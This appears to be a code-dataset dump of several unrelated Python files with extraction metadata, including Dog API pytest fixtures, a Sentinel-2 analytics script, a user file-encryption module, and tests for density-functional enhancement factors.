"azure.cli.testsdk.StorageAccountPreparer",
"os.path.join",
"os.path.realpath",
"azure.cli.testsdk.JMESPathCheck",
"azure.cli.testsdk.ResourceGroupPreparer"
] | [((595, 618), 'azure.cli.testsdk.ResourceGroupPreparer', 'ResourceGroupPreparer', ([], {}), '()\n', (616, 618), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((624, 648), 'azure.cli.testsdk.StorageAccountPreparer', 'StorageAccountPreparer', ([], {}), '()\n', (646, 648), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((874, 900), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (890, 900), False, 'import os\n'), ((1613, 1651), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'local_file_name'], {}), "('name', local_file_name)\n", (1626, 1651), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((1685, 1753), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.cacheControl"""', '"""no-cache"""'], {}), "('properties.contentSettings.cacheControl', 'no-cache')\n", (1698, 1753), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((1787, 1863), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.contentDisposition"""', '"""attachment"""'], {}), "('properties.contentSettings.contentDisposition', 'attachment')\n", (1800, 1863), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((1897, 1968), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.contentEncoding"""', '"""compress"""'], {}), "('properties.contentSettings.contentEncoding', 'compress')\n", (1910, 1968), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((2002, 2070), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', 
(['"""properties.contentSettings.contentLanguage"""', '"""en-US"""'], {}), "('properties.contentSettings.contentLanguage', 'en-US')\n", (2015, 2070), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((2104, 2183), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""properties.contentSettings.contentType"""', '"""multipart/form-data;"""'], {}), "('properties.contentSettings.contentType', 'multipart/form-data;')\n", (2117, 2183), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((2217, 2258), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""metadata"""', "{'key': 'val'}"], {}), "('metadata', {'key': 'val'})\n", (2230, 2258), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((2971, 3009), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'local_file_name'], {}), "('name', local_file_name)\n", (2984, 3009), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((3330, 3362), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'dest_file'], {}), "('name', dest_file)\n", (3343, 3362), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((3693, 3725), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'dest_file'], {}), "('name', dest_file)\n", (3706, 3725), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((4224, 4262), 'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'local_file_name'], {}), "('name', local_file_name)\n", (4237, 4262), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((4620, 4652), 
'azure.cli.testsdk.JMESPathCheck', 'JMESPathCheck', (['"""name"""', 'dest_file'], {}), "('name', dest_file)\n", (4633, 4652), False, 'from azure.cli.testsdk import ResourceGroupPreparer, StorageAccountPreparer, JMESPathCheck, ScenarioTest\n'), ((923, 960), 'os.path.join', 'os.path.join', (['curr_dir', '"""upload_file"""'], {}), "(curr_dir, 'upload_file')\n", (935, 960), False, 'import os\n')] |
"""Fixtures for tests.py (Dogs API testing)"""
import pytest
import requests
URLS = ["https://dog.ceo/dog-api/",
"https://dog.ceo/api/breeds/list/all",
"https://dog.ceo/api/breeds/image/random",
"https://dog.ceo/api/breeds/image/random/3",
"https://dog.ceo/api/breed/hound/images",
"https://dog.ceo/api/breed/hound/images/random",
"https://dog.ceo/api/breed/hound/images/random/3",
"https://dog.ceo/api/breed/hound/list",
"https://dog.ceo/api/breed/hound/afghan/images",
"https://dog.ceo/api/breed/hound/afghan/images/random",
"https://dog.ceo/api/breed/hound/afghan/images/random/3", ]
"""List general ULRS with Dogs API"""
HEADERS = [{"Content-type": "application/json"}, {"Content-type": "text/html"}, {}]
PAIRS = [(url, header) for url in URLS for header in HEADERS]
@pytest.fixture(params=PAIRS)
def pairs_of_response(request):
    """GET response for one (url, headers) pair, parametrized over PAIRS."""
    url, headers = request.param
    response = requests.get(url, headers=headers)
    print(url)
    print(headers)
    return response
@pytest.fixture()
def listallbreeds():
    """JSON payload of GET https://dog.ceo/api/breeds/list/all."""
    return requests.get(URLS[1]).json()
@pytest.fixture()
def randomimage():
    """Accessor object whose get_random_image() fetches one random image."""
    class Randomimage():
        """Defers the HTTP request until the test actually calls it."""
        @staticmethod
        def get_random_image():
            """Fetch JSON for a single random dog image."""
            return requests.get(URLS[2]).json()
    return Randomimage()
@pytest.fixture()
def randomthreeimage():
    """Accessor object whose get_random_three_image() fetches three images."""
    class Randomimage():
        """Defers the HTTP request until the test actually calls it."""
        @staticmethod
        def get_random_three_image():
            """Fetch JSON for three random dog images."""
            return requests.get(URLS[3]).json()
    return Randomimage()
@pytest.fixture()
def list_of_breed():
    """JSON list of all images for breed 'hound'."""
    return requests.get(URLS[4]).json()
@pytest.fixture()
def get_random_image_by_breed():
    """Accessor whose get_random_image() fetches a random 'hound' image."""
    class Randomimage():
        """Defers the HTTP request until the test actually calls it."""
        @staticmethod
        def get_random_image():
            """Fetch JSON for one random image of breed 'hound'."""
            return requests.get(URLS[5]).json()
    return Randomimage()
@pytest.fixture()
def get_random_three_image_by_breed():
    """Accessor whose get_random_three_image() fetches three 'hound' images."""
    class Randomimage():
        """Defers the HTTP request until the test actually calls it."""
        @staticmethod
        def get_random_three_image():
            """Fetch JSON for three random images of breed 'hound'."""
            return requests.get(URLS[6]).json()
    return Randomimage()
@pytest.fixture()
def listallsubbreeds():
    """JSON list of all sub-breeds for breed 'hound'."""
    return requests.get(URLS[7]).json()
@pytest.fixture()
def list_of_subbreed():
    """JSON list of all images for sub-breed 'afghan' of breed 'hound'."""
    return requests.get(URLS[8]).json()
@pytest.fixture()
def get_random_image_by_subbreed():
    """Accessor whose get_random_image() fetches a random 'afghan' image."""
    class Randomimage():
        """Defers the HTTP request until the test actually calls it."""
        @staticmethod
        def get_random_image():
            """Fetch JSON for one random image of sub-breed 'afghan'."""
            return requests.get(URLS[9]).json()
    return Randomimage()
@pytest.fixture()
def get_random_three_image_by_subbreed():
    """Accessor whose get_random_three_image() fetches three 'afghan' images."""
    class Randomimage():
        """Defers the HTTP request until the test actually calls it."""
        @staticmethod
        def get_random_three_image():
            """Fetch JSON for three random images of sub-breed 'afghan'."""
            return requests.get(URLS[10]).json()
    return Randomimage()
| [
"pytest.fixture",
"requests.get"
] | [((856, 884), 'pytest.fixture', 'pytest.fixture', ([], {'params': 'PAIRS'}), '(params=PAIRS)\n', (870, 884), False, 'import pytest\n'), ((1148, 1164), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (1162, 1164), False, 'import pytest\n'), ((1361, 1377), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (1375, 1377), False, 'import pytest\n'), ((1824, 1840), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (1838, 1840), False, 'import pytest\n'), ((2302, 2318), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (2316, 2318), False, 'import pytest\n'), ((2569, 2585), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (2583, 2585), False, 'import pytest\n'), ((3059, 3075), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (3073, 3075), False, 'import pytest\n'), ((3574, 3590), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (3588, 3590), False, 'import pytest\n'), ((3853, 3869), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (3867, 3869), False, 'import pytest\n'), ((4135, 4151), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (4149, 4151), False, 'import pytest\n'), ((4653, 4669), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (4667, 4669), False, 'import pytest\n'), ((1012, 1068), 'requests.get', 'requests.get', (['request.param[0]'], {'headers': 'request.param[1]'}), '(request.param[0], headers=request.param[1])\n', (1024, 1068), False, 'import requests\n'), ((1283, 1304), 'requests.get', 'requests.get', (['URLS[1]'], {}), '(URLS[1])\n', (1295, 1304), False, 'import requests\n'), ((2491, 2512), 'requests.get', 'requests.get', (['URLS[4]'], {}), '(URLS[4])\n', (2503, 2512), False, 'import requests\n'), ((3775, 3796), 'requests.get', 'requests.get', (['URLS[7]'], {}), '(URLS[7])\n', (3787, 3796), False, 'import requests\n'), ((4057, 4078), 'requests.get', 'requests.get', (['URLS[8]'], {}), '(URLS[8])\n', (4069, 4078), False, 'import requests\n'), ((1704, 1725), 'requests.get', 'requests.get', (['URLS[2]'], {}), 
'(URLS[2])\n', (1716, 1725), False, 'import requests\n'), ((2182, 2203), 'requests.get', 'requests.get', (['URLS[3]'], {}), '(URLS[3])\n', (2194, 2203), False, 'import requests\n'), ((2939, 2960), 'requests.get', 'requests.get', (['URLS[5]'], {}), '(URLS[5])\n', (2951, 2960), False, 'import requests\n'), ((3454, 3475), 'requests.get', 'requests.get', (['URLS[6]'], {}), '(URLS[6])\n', (3466, 3475), False, 'import requests\n'), ((4533, 4554), 'requests.get', 'requests.get', (['URLS[9]'], {}), '(URLS[9])\n', (4545, 4554), False, 'import requests\n'), ((5071, 5093), 'requests.get', 'requests.get', (['URLS[10]'], {}), '(URLS[10])\n', (5083, 5093), False, 'import requests\n')] |
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
from __future__ import print_function
import numpy as np
import os
import argparse
import time
import pandas as pd
from termcolor import colored
from analytics.analyzer import Sentinel2Analyzer
parser = argparse.ArgumentParser(description='Sentinel 2 All band median analytics ')
parser.add_argument("datafolder", help="/path/to/Data/Folder")
parser.add_argument("maskPath", help="/path/to/geotiff/mask.tiff")
parser.add_argument("analyticsSavingPath", help="/path/to/save/analytics_data")
args = parser.parse_args()
data_dir=args.datafolder
mask_path=args.maskPath
analytics_data_path=args.analyticsSavingPath
analyzer=Sentinel2Analyzer()
df=pd.DataFrame(columns=analyzer.analytics_parameters)
saveAsCSV=True
def moduleRun(data_dir,df):
zones=os.listdir(data_dir)
for zone in zones:
dpath=os.path.join(data_dir,zone)
fpaths=os.listdir(dpath)
for fpath in fpaths:
start_time = time.time()
directory=os.path.join(data_dir,zone,fpath)
get_analytics(directory,mask_path,analytics_data_path)
temp=pd.DataFrame([analyzer.analytics_values],columns=analyzer.analytics_parameters)
df=df.append(temp,ignore_index=True)
print(colored('\t|- Time Elapsed : {file_name:s} in {te:s}'.format(file_name=os.path.basename(directory),te=str(time.time()-start_time)),'red'))
print()
return df
def get_analytics(directory,mask_path,analytics_data_path):
analyzer.mask_path=mask_path
analyzer.analytics_data_path=analytics_data_path
analyzer.generateAnalytics(directory)
'''
CODE TO TURN CSV INTO DF:
csv_file_name=''
df=pd.read_csv(csv_file_name,sep='\t',skiprows=[0],names=col_names)
'''
if __name__=='__main__':
df=moduleRun(data_dir,df)
df['Acquisition_Date']=pd.to_datetime(df['Acquisition_Date'])
df.set_index(['Acquisition_Date'],inplace=True)
df=df.sort_index()
csv_file_name=os.path.join(analyzer.analytics_data_path,'analytics.csv')
df.to_csv(csv_file_name, sep='\t', encoding='utf-8')
print(colored('# Saved analytics at: {}'.format(csv_file_name),'green'))
| [
"os.listdir",
"analytics.analyzer.Sentinel2Analyzer",
"argparse.ArgumentParser",
"os.path.join",
"os.path.basename",
"pandas.DataFrame",
"time.time",
"pandas.to_datetime"
] | [((252, 328), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Sentinel 2 All band median analytics """'}), "(description='Sentinel 2 All band median analytics ')\n", (275, 328), False, 'import argparse\n'), ((671, 690), 'analytics.analyzer.Sentinel2Analyzer', 'Sentinel2Analyzer', ([], {}), '()\n', (688, 690), False, 'from analytics.analyzer import Sentinel2Analyzer\n'), ((695, 746), 'pandas.DataFrame', 'pd.DataFrame', ([], {'columns': 'analyzer.analytics_parameters'}), '(columns=analyzer.analytics_parameters)\n', (707, 746), True, 'import pandas as pd\n'), ((803, 823), 'os.listdir', 'os.listdir', (['data_dir'], {}), '(data_dir)\n', (813, 823), False, 'import os\n'), ((1932, 1970), 'pandas.to_datetime', 'pd.to_datetime', (["df['Acquisition_Date']"], {}), "(df['Acquisition_Date'])\n", (1946, 1970), True, 'import pandas as pd\n'), ((2079, 2138), 'os.path.join', 'os.path.join', (['analyzer.analytics_data_path', '"""analytics.csv"""'], {}), "(analyzer.analytics_data_path, 'analytics.csv')\n", (2091, 2138), False, 'import os\n'), ((865, 893), 'os.path.join', 'os.path.join', (['data_dir', 'zone'], {}), '(data_dir, zone)\n', (877, 893), False, 'import os\n'), ((908, 925), 'os.listdir', 'os.listdir', (['dpath'], {}), '(dpath)\n', (918, 925), False, 'import os\n'), ((980, 991), 'time.time', 'time.time', ([], {}), '()\n', (989, 991), False, 'import time\n'), ((1027, 1062), 'os.path.join', 'os.path.join', (['data_dir', 'zone', 'fpath'], {}), '(data_dir, zone, fpath)\n', (1039, 1062), False, 'import os\n'), ((1171, 1256), 'pandas.DataFrame', 'pd.DataFrame', (['[analyzer.analytics_values]'], {'columns': 'analyzer.analytics_parameters'}), '([analyzer.analytics_values], columns=analyzer.analytics_parameters\n )\n', (1183, 1256), True, 'import pandas as pd\n'), ((1403, 1430), 'os.path.basename', 'os.path.basename', (['directory'], {}), '(directory)\n', (1419, 1430), False, 'import os\n'), ((1438, 1449), 'time.time', 'time.time', ([], {}), '()\n', 
(1447, 1449), False, 'import time\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2020/9/16 13:23
# @Author : JackyLUO
# @E-mail : <EMAIL>
# @Site :
# @File : read_mat.py
# @Software: PyCharm
import pandas as pd
import scipy.io as scio
dataFile = "roc_curves/CUHKMED/roc_curve.mat"
data = scio.loadmat(dataFile)
fpr = data['fpr'][0]
tpr = data['tpr'][0]
df = pd.DataFrame({'FPR': fpr, 'TPR': tpr})
df.to_csv("res.csv")
| [
"pandas.DataFrame",
"scipy.io.loadmat"
] | [((277, 299), 'scipy.io.loadmat', 'scio.loadmat', (['dataFile'], {}), '(dataFile)\n', (289, 299), True, 'import scipy.io as scio\n'), ((349, 387), 'pandas.DataFrame', 'pd.DataFrame', (["{'FPR': fpr, 'TPR': tpr}"], {}), "({'FPR': fpr, 'TPR': tpr})\n", (361, 387), True, 'import pandas as pd\n')] |
import os
from datetime import datetime, timedelta
from src.database.models.user import User # noqa
from src.database.models.file import File # noqa
from src.database.session import db_session # noqa
from src.utils.hash import hash_pass
from sqlalchemy.orm.exc import NoResultFound
from src.utils.cipher import encrypt_file, decrypt_file
from src.utils.hash import hash_md5, generate_token
from src.utils.mail_sender import send_mail_login
def create_user(username, email, password):
user = User(username=username, email=email, hashed_password=hash_pass(username, password))
try:
db_session.add(user)
db_session.commit()
db_session.flush()
return user
except:
db_session.rollback()
return None
def connect_user(username, password):
user = db_session.query(User).filter(User.username == username).first()
if user and user.check_password(password=password):
user.login_token = str(generate_token())
user.login_token_expiration = (datetime.now() + timedelta(minutes=5)).timestamp()
db_session.add(user)
db_session.commit()
db_session.flush()
send_mail_login(str(user.email), user.login_token)
return user
return None
def encrypt_user_file(user, path, key):
if not key:
print("Error: se debe ingresar una clave")
return
if not path:
print("Error: se debe ingresar una ruta de archivo")
return
nonce, ciphertext, mac = encrypt_file(hash_md5(key).encode("utf8"), path)
if not ciphertext:
print("Error al encriptar el archivo, puede que el archivo que quiera encriptar este vacio")
return
user.files.append(
File(name=os.path.basename(path), encrypted_file=ciphertext, nonce=nonce, mac=mac)
)
db_session.commit()
def decrypt_user_file(user, file_id, path, key):
if not path:
print("No se especifico una ruta de archivo para guadar")
return
try:
decrypt_file(
hash_md5(key).encode("utf8"),
db_session.query(File).filter(File.id == file_id).one(),
path,
)
except NoResultFound:
print("El archivo no existe")
except Exception:
print("Error inesperado")
def check_token_user(user, token):
if user.login_token and user.login_token_expiration:
date = datetime.fromtimestamp(user.login_token_expiration)
if (date - datetime.now()).total_seconds() > 0:
if user.login_token == token:
return True
else:
print("Token invaldo")
else:
print("Token expirado")
return False
| [
"src.database.session.db_session.commit",
"src.database.session.db_session.rollback",
"datetime.datetime.fromtimestamp",
"src.utils.hash.hash_md5",
"src.utils.hash.hash_pass",
"src.database.session.db_session.add",
"src.utils.hash.generate_token",
"src.database.session.db_session.flush",
"src.databa... | [((1811, 1830), 'src.database.session.db_session.commit', 'db_session.commit', ([], {}), '()\n', (1828, 1830), False, 'from src.database.session import db_session\n'), ((604, 624), 'src.database.session.db_session.add', 'db_session.add', (['user'], {}), '(user)\n', (618, 624), False, 'from src.database.session import db_session\n'), ((633, 652), 'src.database.session.db_session.commit', 'db_session.commit', ([], {}), '()\n', (650, 652), False, 'from src.database.session import db_session\n'), ((661, 679), 'src.database.session.db_session.flush', 'db_session.flush', ([], {}), '()\n', (677, 679), False, 'from src.database.session import db_session\n'), ((1081, 1101), 'src.database.session.db_session.add', 'db_session.add', (['user'], {}), '(user)\n', (1095, 1101), False, 'from src.database.session import db_session\n'), ((1110, 1129), 'src.database.session.db_session.commit', 'db_session.commit', ([], {}), '()\n', (1127, 1129), False, 'from src.database.session import db_session\n'), ((1138, 1156), 'src.database.session.db_session.flush', 'db_session.flush', ([], {}), '()\n', (1154, 1156), False, 'from src.database.session import db_session\n'), ((2379, 2430), 'datetime.datetime.fromtimestamp', 'datetime.fromtimestamp', (['user.login_token_expiration'], {}), '(user.login_token_expiration)\n', (2401, 2430), False, 'from datetime import datetime, timedelta\n'), ((556, 585), 'src.utils.hash.hash_pass', 'hash_pass', (['username', 'password'], {}), '(username, password)\n', (565, 585), False, 'from src.utils.hash import hash_pass\n'), ((720, 741), 'src.database.session.db_session.rollback', 'db_session.rollback', ([], {}), '()\n', (739, 741), False, 'from src.database.session import db_session\n'), ((965, 981), 'src.utils.hash.generate_token', 'generate_token', ([], {}), '()\n', (979, 981), False, 'from src.utils.hash import hash_md5, generate_token\n'), ((1512, 1525), 'src.utils.hash.hash_md5', 'hash_md5', (['key'], {}), '(key)\n', (1520, 1525), False, 
'from src.utils.hash import hash_md5, generate_token\n'), ((1728, 1750), 'os.path.basename', 'os.path.basename', (['path'], {}), '(path)\n', (1744, 1750), False, 'import os\n'), ((813, 835), 'src.database.session.db_session.query', 'db_session.query', (['User'], {}), '(User)\n', (829, 835), False, 'from src.database.session import db_session\n'), ((1022, 1036), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (1034, 1036), False, 'from datetime import datetime, timedelta\n'), ((1039, 1059), 'datetime.timedelta', 'timedelta', ([], {'minutes': '(5)'}), '(minutes=5)\n', (1048, 1059), False, 'from datetime import datetime, timedelta\n'), ((2023, 2036), 'src.utils.hash.hash_md5', 'hash_md5', (['key'], {}), '(key)\n', (2031, 2036), False, 'from src.utils.hash import hash_md5, generate_token\n'), ((2450, 2464), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (2462, 2464), False, 'from datetime import datetime, timedelta\n'), ((2065, 2087), 'src.database.session.db_session.query', 'db_session.query', (['File'], {}), '(File)\n', (2081, 2087), False, 'from src.database.session import db_session\n')] |
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for symbolic.enhancement_factors."""
import copy
from absl.testing import absltest
from absl.testing import parameterized
import jax
import numpy as np
import sympy
from symbolic_functionals.syfes.symbolic import enhancement_factors
from symbolic_functionals.syfes.symbolic import instructions
from symbolic_functionals.syfes.xc import gga
from symbolic_functionals.syfes.xc import mgga
jax.config.update('jax_enable_x64', True)
class EnhancementFactorTest(parameterized.TestCase):
def setUp(self):
super().setUp()
self.num_features = 2
self.num_shared_parameters = 2
self.num_variables = 3
self.features = {
f'feature_{i}': np.random.rand(5) for i in range(self.num_features)
}
self.shared_parameters = {
f'shared_parameter_{i}': np.random.rand()
for i in range(self.num_shared_parameters)
}
self.bound_parameters = {'gamma_utransform': np.random.rand()}
self.parameters = {**self.shared_parameters, **self.bound_parameters}
self.variables = {
f'variable_{i}': np.zeros(5) for i in range(self.num_variables - 1)
}
self.variables.update({'enhancement_factor': np.zeros(5)})
self.enhancement_factor = enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[
instructions.MultiplicationInstruction(
'variable_0', 'feature_0', 'shared_parameter_0'),
instructions.AdditionInstruction(
'variable_1', 'feature_1', 'shared_parameter_1'),
instructions.AdditionInstruction(
'variable_1', 'variable_1', 'variable_0'),
instructions.Power2Instruction('enhancement_factor', 'variable_1'),
instructions.UTransformInstruction(
'enhancement_factor', 'enhancement_factor')
])
def test_constructor(self):
self.assertEqual(self.enhancement_factor.num_features, self.num_features)
self.assertEqual(self.enhancement_factor.num_parameters,
self.num_shared_parameters + 1) # 1 from UTransform
self.assertEqual(self.enhancement_factor.num_variables, self.num_variables)
def test_constructor_without_enhancement_factor_in_variable_names(self):
with self.assertRaisesRegex(
ValueError, '"enhancement_factor" not found in variable_names.'):
enhancement_factors.EnhancementFactor(
feature_names=[],
shared_parameter_names=[],
variable_names=[],
instruction_list=[])
def test_constructor_with_repeated_name(self):
with self.assertRaisesRegex(ValueError, 'Repeated names found in input.'):
enhancement_factors.EnhancementFactor(
feature_names=['var'],
shared_parameter_names=['var'],
variable_names=['enhancement_factor'],
instruction_list=[])
def test_constructor_with_wrong_instruction_type(self):
with self.assertRaisesRegex(
TypeError, r"1 is of type <class 'int'>, not an "
'instance of instructions.Instruction'):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[1])
@parameterized.parameters(
(instructions.Power2Instruction('variable_0', 'var'),
(r'Instruction variable_0 = var \*\* 2 contains invalid input argument '
'var')),
(instructions.AdditionInstruction('variable_0', 'shared_parameter_1',
'gamma_utransform'),
(r'Instruction variable_0 = shared_parameter_1 \+ gamma_utransform '
'contains invalid input argument gamma_utransform')),
)
def test_constructor_with_invalid_input(self, instruction, error_message):
with self.assertRaisesRegex(ValueError, error_message):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[instruction])
@parameterized.parameters(
(instructions.Power2Instruction('feature_0', 'shared_parameter_0'),
(r'Instruction feature_0 = shared_parameter_0 \*\* 2 contains '
'invalid output argument feature_0')),
(instructions.AdditionInstruction(
'feature_1', 'shared_parameter_1', 'variable_1'),
(r'Instruction feature_1 = shared_parameter_1 \+ variable_1 contains '
'invalid output argument feature_1')
),
(instructions.Power4Instruction(
'bound_parameter_1', 'shared_parameter_1'),
(r'Instruction bound_parameter_1 = shared_parameter_1 \*\* 4 contains '
'invalid output argument bound_parameter_1')
),
)
def test_constructor_with_invalid_output(self, instruction, error_message):
with self.assertRaisesRegex(ValueError, error_message):
enhancement_factors.EnhancementFactor(
feature_names=list(self.features.keys()),
shared_parameter_names=list(self.shared_parameters.keys()),
variable_names=list(self.variables.keys()),
instruction_list=[instruction])
@parameterized.parameters(False, True)
def test_eval(self, use_jax):
tmp = (
(self.features['feature_0'] * self.parameters['shared_parameter_0']) +
(self.features['feature_1'] + self.parameters['shared_parameter_1']))
tmp = self.parameters['gamma_utransform'] * tmp ** 2
expected_f = tmp / (1. + tmp)
f = self.enhancement_factor.eval(
self.features, self.parameters, use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_u_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
u = gga.u_b97(x, gamma=gamma_x)
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_u.eval(
features={'u': u},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_u_short_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
u = gga.u_b97(x, gamma=gamma_x)
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_u_short.eval(
features={'u': u},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_x2_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_x2.eval(
features={'x2': x2},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
'gamma': gamma_x
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(False, True)
def test_b97_x2_short_enhancement_factor(self, use_jax):
gamma_x = 0.004
coeffs_x = 0.8094, 0.5073, 0.7481
x = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
expected_f = gga.f_b97(x)
f = enhancement_factors.f_b97_x2_short.eval(
features={'x2': x2},
parameters={
'c0': coeffs_x[0],
'c1': coeffs_x[1],
'c2': coeffs_x[2],
'gamma_utransform': gamma_x
},
use_jax=use_jax)
np.testing.assert_allclose(f, expected_f)
@parameterized.parameters(
(enhancement_factors.f_x_wb97mv,
enhancement_factors.f_css_wb97mv,
enhancement_factors.f_cos_wb97mv,
'gamma'),
(enhancement_factors.f_x_wb97mv_short,
enhancement_factors.f_css_wb97mv_short,
enhancement_factors.f_cos_wb97mv_short,
'gamma_utransform'),
)
def test_wb97mv_enhancement_factors(self,
f_x_wb97mv,
f_css_wb97mv,
f_cos_wb97mv,
gamma_key):
rho = np.random.rand(5)
x = np.random.rand(5)
tau = np.random.rand(5)
x2 = (1 / 2)**(-2 / 3) * x**2
t = mgga.get_mgga_t(rho, tau, polarized=False)
w = (t - 1) / (t + 1)
expected_f_x = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_x'],
power_series=mgga.WB97MV_PARAMS['power_series_x'], polarized=False)
expected_f_css = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_ss'],
power_series=mgga.WB97MV_PARAMS['power_series_ss'], polarized=False)
expected_f_cos = mgga.f_b97m(
x, t, gamma=mgga.WB97MV_PARAMS['gamma_os'],
power_series=mgga.WB97MV_PARAMS['power_series_os'], polarized=False)
f_x = f_x_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_x'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_x'][1][2],
'c01': mgga.WB97MV_PARAMS['power_series_x'][2][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_x']})
f_css = f_css_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_ss'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_ss'][1][2],
'c20': mgga.WB97MV_PARAMS['power_series_ss'][2][2],
'c43': mgga.WB97MV_PARAMS['power_series_ss'][3][2],
'c04': mgga.WB97MV_PARAMS['power_series_ss'][4][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_ss']})
f_cos = f_cos_wb97mv.eval(
features={'x2': x2, 'w': w},
parameters={
'c00': mgga.WB97MV_PARAMS['power_series_os'][0][2],
'c10': mgga.WB97MV_PARAMS['power_series_os'][1][2],
'c20': mgga.WB97MV_PARAMS['power_series_os'][2][2],
'c60': mgga.WB97MV_PARAMS['power_series_os'][3][2],
'c21': mgga.WB97MV_PARAMS['power_series_os'][4][2],
'c61': mgga.WB97MV_PARAMS['power_series_os'][5][2],
gamma_key: mgga.WB97MV_PARAMS['gamma_os']})
np.testing.assert_allclose(f_x, expected_f_x)
np.testing.assert_allclose(f_css, expected_f_css)
